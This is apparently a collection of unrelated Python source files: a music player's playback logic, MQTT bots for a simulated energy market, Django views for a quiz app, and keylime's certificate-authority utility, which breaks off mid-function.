args=(on_exit, new_url, args["expires"], args["get_time"]),
)
cache_thread = threading.Thread(
target=self.download_song,
args=(
args["song_id"],
args["song_name"],
args["artist"],
args["mp3_url"],
),
)
cache_thread.start()
thread.start()
lyric_download_thread = threading.Thread(target=self.download_lyric)
lyric_download_thread.start()
tlyric_download_thread = threading.Thread(
target=self.download_lyric, args=(True,)
)
tlyric_download_thread.start()
# returns immediately after the thread starts
return thread
def replay(self):
if not self.is_index_valid:
self.stop()
if self.end_callback:
log.debug("Callback")
self.end_callback()
return
if not self.current_song:
return
self.stop()
self.playing_flag = True
self.build_playinfo()
self.notify_playing()
self.start_playing(lambda: 0, self.current_song)
def shuffle_order(self):
del self.order[:]
self.order.extend(list(range(0, len(self.list))))
random.shuffle(self.order)
self.info["random_index"] = 0
def new_player_list(self, type, title, datalist, offset):
self.info["player_list_type"] = type
self.info["player_list_title"] = title
# self.info['idx'] = offset
self.info["player_list"] = []
self.info["playing_order"] = []
self.info["random_index"] = 0
self.songs.clear()
self.add_songs(datalist)
def append_songs(self, datalist):
self.add_songs(datalist)
    # switch_flag is True when the cursor is inside the playing list, or when the
    # current list type is not one of "songs", "djchannels" or "fmsongs"
def play_or_pause(self, idx, switch_flag):
if self.is_empty:
return
# print('flag:',switch_flag)
# if same "list index" and "playing index" --> same song :: pause/resume it
if self.index == idx and switch_flag:
if not self.popen_handler:
# print('aaaaaa')
self.stop()
self.replay()
else:
# print('bbbbbb')
self.switch()
else:
# print('cccccccc')
self.info["idx"] = idx
self.stop()
self.replay()
def _swap_song(self):
now_songs = self.order.index(self.index)
self.order[0], self.order[now_songs] = self.order[now_songs], self.order[0]
def _need_to_shuffle(self):
playing_order = self.order
random_index = self.info["random_index"]
if (
random_index >= len(playing_order)
or playing_order[random_index] != self.index
):
return True
else:
return False
def next_idx(self):
if not self.is_index_valid:
return self.stop()
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
            # make sure self.index does not run past the end of the playlist
if self.info["idx"] < playlist_len:
self.info["idx"] += 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.index + 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
                # when the playing order is regenerated,
                # keep the previously playing song in place
self._swap_song()
playing_order_len = len(self.order)
self.info["random_index"] += 1
            # handle running past the end of the playing order
if self.mode == Player.MODE_RANDOM_LOOP:
self.info["random_index"] %= playing_order_len
            # random but not looping: past the end, stop playing
if self.info["random_index"] >= playing_order_len:
self.info["idx"] = playlist_len
else:
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def next(self):
self.stop()
self.next_idx()
self.replay()
def prev_idx(self):
if not self.is_index_valid:
self.stop()
return
playlist_len = len(self.list)
if self.mode == Player.MODE_ORDERED:
if self.info["idx"] > 0:
self.info["idx"] -= 1
elif self.mode == Player.MODE_ORDERED_LOOP:
self.info["idx"] = (self.info["idx"] - 1) % playlist_len
elif self.mode == Player.MODE_SINGLE_LOOP:
self.info["idx"] = self.info["idx"]
else:
playing_order_len = len(self.order)
if self._need_to_shuffle():
self.shuffle_order()
playing_order_len = len(self.order)
self.info["random_index"] -= 1
if self.info["random_index"] < 0:
if self.mode == Player.MODE_RANDOM:
self.info["random_index"] = 0
else:
self.info["random_index"] %= playing_order_len
self.info["idx"] = self.order[self.info["random_index"]]
if self.playing_song_changed_callback is not None:
self.playing_song_changed_callback()
def prev(self):
self.stop()
self.prev_idx()
self.replay()
def shuffle(self):
self.stop()
self.info["playing_mode"] = Player.MODE_RANDOM
self.shuffle_order()
self.info["idx"] = self.info["playing_order"][self.info["random_index"]]
self.replay()
def volume_up(self):
self.tune_volume(5)
def volume_down(self):
self.tune_volume(-5)
def update_size(self):
self.ui.update_size()
self.build_playinfo()
def cache_song(self, song_id, song_name, artist, song_url):
def on_exit(song_id, path):
self.songs[str(song_id)]["cache"] = path
self.cache.enable = False
self.cache.enable = True
self.cache.add(song_id, song_name, artist, song_url, on_exit)
self.cache.start_download()
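# A hedged usage sketch (not part of the original module): roughly how this
# Player could be driven on its own, assuming mpg123 is installed and that the
# song dict carries the fields read by add_songs()/start_playing() above. The
# song id and URL below are placeholders, not real NetEase data.
if __name__ == "__main__":
    demo_song = {
        "song_id": 1,
        "song_name": "demo track",
        "artist": "unknown artist",
        "album_name": "demo album",
        "quality": "MD 128k",
        "mp3_url": "http://example.com/demo.mp3",  # placeholder, not a real stream
        "expires": 1200,
        "get_time": time.time(),
    }
    demo_player = Player()
    demo_player.new_player_list("songs", "demo list", [demo_song], offset=0)
    demo_player.play_or_pause(0, switch_flag=False)
    time.sleep(5)  # let mpg123 run for a few seconds
    demo_player.stop()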
|
bot.py
|
from collections import OrderedDict
from elecbay import stop_bidding
import paho.mqtt.client as mqtt
import time
import json
from random import randrange, uniform
from threading import Thread
import logging
from datetime import datetime, timedelta
class BuyerBot:
def __init__(self, id):
self.id = id
self.client = mqtt.Client("elecbay_market_buyer" + str(self.id))
self.mqttBroker = "iot.eclipse.org" # "iot.eclipse.org" #"test.mosquitto.org"
self.can_bid = False
self.approved_orders = []
self.rejected_orders = []
self.offered_items = []
def on(self):
logging.info("Thread buyer-bot-%s: starting", self.id)
self.client.on_message = self.on_message
self.client.connect(self.mqttBroker)
self.client.subscribe(
[('elecbay/item', 0), ('elecbay/order', 0), ('elecbay/bidding', 0)])
        self.client.loop_start()  # separate thread for listening
time.sleep(3)
while self.can_bid:
items = self.browse()
self.bid(items)
self.clear_bidding_process()
# self.consume_energy()
def consume_energy(self):
        # search a topic for the energy provided
        # and detect whether it is available
logging.info(f"buyer-bot-{self.id} : has consumed energy")
def on_message(self, _client, userdata, message):
#print("received message: " ,str(message.payload.decode("utf-8")))
msg = json.loads(str(message.payload.decode("utf-8")))
if str(msg['uid']) == str(self.id) and msg['type'] == 'order':
self.process_order(msg)
if msg['type'] == 'bidding':
if msg['value'] == 'open':
self.can_bid = True
else:
self.can_bid = False
if msg['type'] == 'item':
self.process_item(msg)
def clear_bidding_process(self):
self.approved_orders = []
self.rejected_orders = []
self.offered_items = []
def bid(self, items):
for item in items:
msg = {
"uid": self.id,
"requester": "buyer-bot-" + str(self.id),
"type": "order",
"state": "pending",
"value": uniform(0.0, 10.0),
"duration": 1,
"source": item
}
order = json.dumps(msg)
self.client.publish('market/order', order)
logging.info(
f"buyer-bot-{self.id} : has placed a bid on offering from {item['requestor']}")
def browse(self):
items = []
minimum_energy_required = 1.5
for item in self.offered_items:
if item['value'] > minimum_energy_required:
start_time = datetime.strptime(item['start_time'], '%H:%M:%S')
crit_time = (datetime.now() + timedelta(seconds=5))
if start_time < crit_time:
items.append(item)
logging.info(
f"buyer-bot-{self.id} : has found an offer from {item['requestor']} for energy at {item['start_time']}.")
return items
def process_item(self, msg):
        # look for offerings that fit the criteria
if msg['state'] == 'accepted':
self.offered_items.append(msg)
def process_order(self, msg):
if msg['state'] == 'rejected':
self.rejected_orders.append(msg)
#print('bot[',self.id,']: ',"order was rejected, going to process")
if msg['state'] == 'accepted':
self.approved_orders.append(msg)
logging.info(
f"buyer-bot-{self.id} : bid order has been accepted ; expecting energy exchange from {msg['source']['requestor']} for {msg['source']['value']} at time {msg['source']['start_time']}")
class SellerBot:
def __init__(self, id):
self.id = id
self.client = mqtt.Client("elecbay_market_seller" + str(self.id))
self.mqttBroker = "iot.eclipse.org" # "127.0.0.1"
self.can_offer = False
self.approved_items = []
self.rejected_items = []
def on(self):
logging.info("Thread seller-bot-%s: starting", self.id)
self.client.on_message = self.on_message
self.client.connect(self.mqttBroker)
self.client.subscribe([('elecbay/item', 0), ('elecbay/bidding', 0)])
self.client.loop_start() # separate thread for listening
time.sleep(5)
while self.can_offer:
self.offer()
time.sleep(5)
self.clear_bidding_process()
self.client.loop_stop()
def clear_bidding_process(self):
self.approved_items = []
self.rejected_items = []
def on_message(self, _client, userdata, message):
msg = json.loads(str(message.payload.decode("utf-8")))
#print("seller received message: " ,msg)
if str(msg['uid']) == str(self.id) and msg['type'] == 'item':
self.process_item(msg)
if msg['type'] == 'bidding':
if msg['value'] == 'open':
self.can_offer = True
else:
self.can_offer = False
def offer(self):
msg = {
"uid": self.id,
"requestor": "seller-bot-" + str(self.id),
"type": "item",
"state": "pending",
"value": uniform(0.0, 10.0),
"duration": 1,
"start_time": (datetime.now() + timedelta(seconds=10)).strftime('%H:%M:%S'),
"end_time": (datetime.now() + timedelta(seconds=11)).strftime('%H:%M:%S')
}
item = json.dumps(msg)
self.client.publish('market/offer', item)
logging.info(f"seller-bot-{self.id} : has published offering")
def process_item(self, msg):
if msg['state'] == 'rejected':
self.rejected_items.append(msg)
if msg['state'] == 'accepted':
self.approved_items.append(msg)
def launchBuyerBot(id):
buyer = BuyerBot(id)
buyer.on()
def launchSellerBot(id):
seller = SellerBot(id)
seller.on()
def main():
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO, datefmt="%H:%M:%S")
threads = list()
for index in range(1):
logging.info("Main : create and start thread %d.", index)
x = Thread(target=launchBuyerBot, args=(index,))
y = Thread(target=launchSellerBot, args=(index + 100,))
x.setDaemon(True)
threads.append(x)
y.setDaemon(True)
threads.append(y)
x.start()
y.start()
for index, thread in enumerate(threads):
logging.info("Main : before joining thread %d.", index)
thread.join()
logging.info("Main : thread %d done", index)
if __name__ == "__main__":
main()
|
views.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
from functools import wraps
from collections import defaultdict
from rest_framework import serializers, viewsets
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework.exceptions import APIException
from django.shortcuts import render, HttpResponse
from rest_framework.decorators import api_view
from rest_framework import status
from .models import User, UserExam
import requests
from serializers import QuestionSerializer, ChoiceSerializer
from .models import Exam, Question, Vote, Choice
from haha_api.serializers import UserSerializer, ExamSerializer, VoteSerializer, QuestionSerializer
import os
import sys
import threading
# Create your views here.
def run_async(func):
@wraps(func)
def inner(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs)
thread.daemon = True
thread.start()
return inner
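# Usage sketch: run_async(push_event)(event_data) pushes an event in a daemon thread
# so the HTTP response is not blocked (see the commented call in vote() below).
# request_user_wrapper resolves the calling user from the request body, the
# X-EMAIL header, or the query string, injects it into request.data['user'],
# and returns 401 when no matching user is found.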
def request_user_wrapper(func):
@wraps(func)
def inner(req):
email = req.data.get('email') or req._request.environ.get('HTTP_X_EMAIL') or req.query_params.get('email')
user = User.objects.filter(email=email).first()
if not user:
return Response("NO_EMAIL_PROVIDED_OR_NO_USER", status=status.HTTP_401_UNAUTHORIZED)
req.data['user'] = UserSerializer(user).data
req.data['user']['user_id'] = user.id
return func(req)
return inner
def ping(*args, **kwargs):
return HttpResponse("pong")
class ExamApiView(APIView):
def get(self, request, format=None):
exams = Exam.objects.all()
serializer = ExamSerializer(exams, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
class VoteApiView(APIView):
def post(self, request, format=None):
serializer = VoteSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def push_event(data):
r = requests.post('http://localhost:3100/event', json=data, timeout=1)
r.raise_for_status()
def publish_question(event, question_id, room_id, is_last_question=False):
data = dict()
data['event'] = event
question = QuestionSerializer(Question.objects.filter(pk=question_id).first()).data
choices = [ChoiceSerializer(c).data for c in Choice.objects.filter(question=question_id).all()]
question['is_last_question'] = is_last_question
question['choices'] = choices
data['data'] = question
data['room'] = room_id
push_event(data)
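# The payload forwarded to the realtime server at localhost:3100 looks roughly like
# (field values illustrative):
#   {"event": "...", "room": <room_id>,
#    "data": {<question fields>, "choices": [...], "is_last_question": false}}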
class QuestionApiView(APIView):
def get(self, request, format=None):
questions = Question.objects.all()
serializer = QuestionSerializer(questions, many=True)
return Response(serializer.data, status=status.HTTP_200_OK)
def post(self, request, format=None):
data = {}
try:
publish_question(request.data['event'], request.data['question_id'], request.data['exam_id'])
# data['event'] = request.data['event']
# question = Question.objects.filter(pk=request.data['question_id'])
# choices = Choice.objects.filter(question__id=request.data['question_id'])
# question['choices'] = choices
# data['data'] = question
# data['room'] = request.data['exam_id']
# r = requests.post('http://localhost:3100/event', json=data)
# r.raise_for_status()
except Exception as e:
return Response(str(e), status=status.HTTP_400_BAD_REQUEST)
return Response(request.data, status=status.HTTP_201_CREATED)
@api_view(['POST'])
def signup(request):
if not request.data.get("email") or not request.data.get("username"):
return Response(dict(msg="Field email or username missed"), status=status.HTTP_400_BAD_REQUEST)
serializer = UserSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
data = serializer.data
# data.pop("password")
return Response(data, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
@api_view(['POST'])
@request_user_wrapper
def join_room(request):
# from stream.haha_stream import encode_room_id
room_id = request.data.get('room_id') or request.data.get('room')
user = request.data['user']
exam = Exam.objects.filter(room_id=room_id).first()
if not exam:
return Response(dict(msg="room_id not found"), status=status.HTTP_400_BAD_REQUEST)
if not UserExam.objects.filter(user_id=user['user_id'], exam_id=exam.exam_id).first():
ue = UserExam(user_id=user['user_id'], exam_id=exam.exam_id)
ue.save()
return Response(
dict(room_id=room_id, exam=ExamSerializer(exam).data), status=status.HTTP_200_OK
)
@api_view(['GET'])
@request_user_wrapper
def current_exam(request):
room_id = request.data.get('room') or request.query_params.get('room')
exam = Exam.objects.filter(room_id=room_id).first()
if not exam:
return Response(dict(msg="room_id not found"), status=status.HTTP_400_BAD_REQUEST)
exam_data = ExamSerializer(exam).data
question = QuestionSerializer(Question.objects.filter(pk=exam_data['current_question_id']).first()).data
choices = [ChoiceSerializer(c).data for c in Choice.objects.filter(question=exam_data['current_question_id']).all()]
question['choices'] = choices
exam_data['question'] = question
return Response(exam_data, status=status.HTTP_200_OK)
@api_view(['POST'])
@request_user_wrapper
def vote(request):
user = request.data['user']
exam_id = request.data['exam_id']
choice_id = request.data['choice_id']
score = request.data['score']
exam = Exam.objects.filter(exam_id=exam_id).first()
if not exam:
return Response(dict(msg="exam not found"), status=status.HTTP_400_BAD_REQUEST)
choice = Choice.objects.filter(choice_id=choice_id).first()
if not choice:
return Response(dict(msg="choice not found"), status=status.HTTP_400_BAD_REQUEST)
vote = Vote.objects.filter(exam_id=exam.exam_id, user_id=user['user_id'], choice_id=choice.choice_id).first()
if vote:
return Response(VoteSerializer(vote).data, status=status.HTTP_200_OK)
vote = Vote(user_id=user['user_id'], exam_id=exam.exam_id, choice_id=choice.choice_id, score=int(score))
vote.save()
event_data = {
"room": exam.room_id,
"event": "user_vote",
"data": {
"user": user,
"vote": VoteSerializer(vote).data
}
}
# run_async(push_event)(event_data)
return Response(VoteSerializer(vote).data, status=status.HTTP_200_OK)
@api_view(['GET'])
def report(request):
room = request.data.get("room") or request.query_params.get('room')
if not room:
return Response(dict(msg="field `room` missed "), status=status.HTTP_400_BAD_REQUEST)
exam = Exam.objects.filter(room_id=room).first()
if not exam:
return Response(dict(msg="exam not found "), status=status.HTTP_404_NOT_FOUND)
votes = Vote.objects.filter(exam_id=exam.exam_id).all()
users = set([v.user for v in votes])
data = list()
for u in users:
total_score = sum([v.score for v in votes if v.user.email == u.email])
right_question_count = len([v for v in votes if v.user.email == u.email and v.choice.is_right])
data.append({
"email": u.email,
"total_score": total_score,
"right_question_count": right_question_count,
"username": u.username
})
return Response(data, status=status.HTTP_200_OK)
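# report() responds with one entry per voter, e.g. (values illustrative):
#   [{"email": "a@b.c", "total_score": 7, "right_question_count": 3, "username": "a"}]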
def check_choice_right(choice_id, choices):
return [c for c in choices if c.choice_id == choice_id and c.is_right]
|
ca_util.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage:
# Create a temporary CA cert and its private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
from cryptography import exceptions as crypto_exceptions
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import fs_util
from keylime import json
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception(f"Unknown CA implementation: {config.CA_IMPL}")
global_password = None
def load_cert_by_path(cert_path):
cert = None
with open(cert_path, 'rb') as ca_file:
cert = x509.load_pem_x509_certificate(
data=ca_file.read(),
backend=default_backend(),
)
return cert
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
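# cmd_mkcert: create a cert signed by the CA in `workingdir` -- load the encrypted
# key store, sign a new key/cert pair for `name` with the next serial number, write
# <name>-cert.crt / <name>-private.pem / <name>-public.pem, and verify the new cert
# against the CA public key.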
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
cacert = load_cert_by_path('cacert.crt')
ca_pk = serialization.load_pem_private_key(
priv[0]['ca'],
password=None,
backend=default_backend()
)
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open(f'{name}-cert.crt', 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
priv[0][name] = pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
with os.fdopen(os.open(f"{name}-private.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(priv[0][name])
with os.fdopen(os.open(f"{name}-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
cc = load_cert_by_path(f'{name}-cert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cc.signature,
cc.tbs_certificate_bytes,
padding.PKCS1v15(),
cc.signature_hash_algorithm,
)
logger.info("Created certificate for name %s successfully in %s", name, workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
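# cmd_init: (re)initialize a CA in `workingdir` -- remove any previous PEM/CRT/ZIP/DER
# material and private.yml, generate a new CA cert and key with the configured backend
# (cfssl or openssl), store the key in the encrypted key store, and emit an empty CRL
# (cacrl.der / cacrl.pem).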
def cmd_init(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.public_bytes(serialization.Encoding.PEM))
priv[0]['ca'] = ca_pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
with os.fdopen(os.open("ca-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(ca_pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
# generate an empty crl
cacert_str = cacert.public_bytes(serialization.Encoding.PEM).decode()
crl = ca_impl.gencrl([], cacert_str, priv[0]['ca'].decode())
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = load_cert_by_path('cacert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cac.signature,
cac.tbs_certificate_bytes,
padding.PKCS1v15(),
cac.signature_hash_algorithm,
)
logger.info("CA certificate created successfully in %s", workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# zip up the crt, private key, and public key
with open('cacert.crt', 'rb') as f:
cacert = f.read()
with open(f"{name}-public.pem", 'rb') as f:
pub = f.read()
with open(f"{name}-cert.crt", 'rb') as f:
cert = f.read()
with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'rb') as f:
crlpem = f.read()
cert_obj = x509.load_pem_x509_certificate(
data=cert,
backend=default_backend(),
)
serial = cert_obj.serial_number
subject = cert_obj.subject.rfc4514_string()
priv = read_private()
private = priv[0][name]
with open(f"{name}-private.pem", 'rb') as f:
prot_priv = f.read()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open(f'{name}-pkg.zip', 'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile(f'{name}-pkg.zip', 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip",
name, name)
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w', encoding="utf-8") as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = load_cert_by_path(cert_path)
try:
crl_distpoints = cert_obj.extensions.get_extension_for_class(x509.CRLDistributionPoints).value
for dstpnt in crl_distpoints:
for point in dstpnt.full_name:
if isinstance(point, x509.general_name.UniformResourceIdentifier):
return point.value
except x509.extensions.ExtensionNotFound:
pass
logger.info("No CRL distribution points in %s", cert_path)
return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = load_cert_by_path(f'{name}-cert.crt')
serial = cert.serial_number
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode()
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s",
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d",
socket.getfqdn(), config.CRL_PORT)
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check whether the CRL expires within the next 6 hours
in6hours = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in6hours:
logger.info(
"CRL expires soon (%s), re-issuing", expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s", revocation)
return
logger.info("Revoking certificate: %s", serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from %s with uri: %s', str(self.client_address), self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
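# On-disk key store layout (private.yml): {'salt': <b64 salt>, 'priv': <ciphertext>},
# where the decrypted payload is the YAML-encoded dict returned by read_private():
# cert names mapped to PEM private keys plus the bookkeeping entries 'ca',
# 'lastserial' and 'revoked_keys'.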
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w', encoding="utf-8") as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', encoding="utf-8") as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet.",
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv): #pylint: disable=dangerous-default-value
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s", config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
# set a conservative general umask
os.umask(0o077)
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
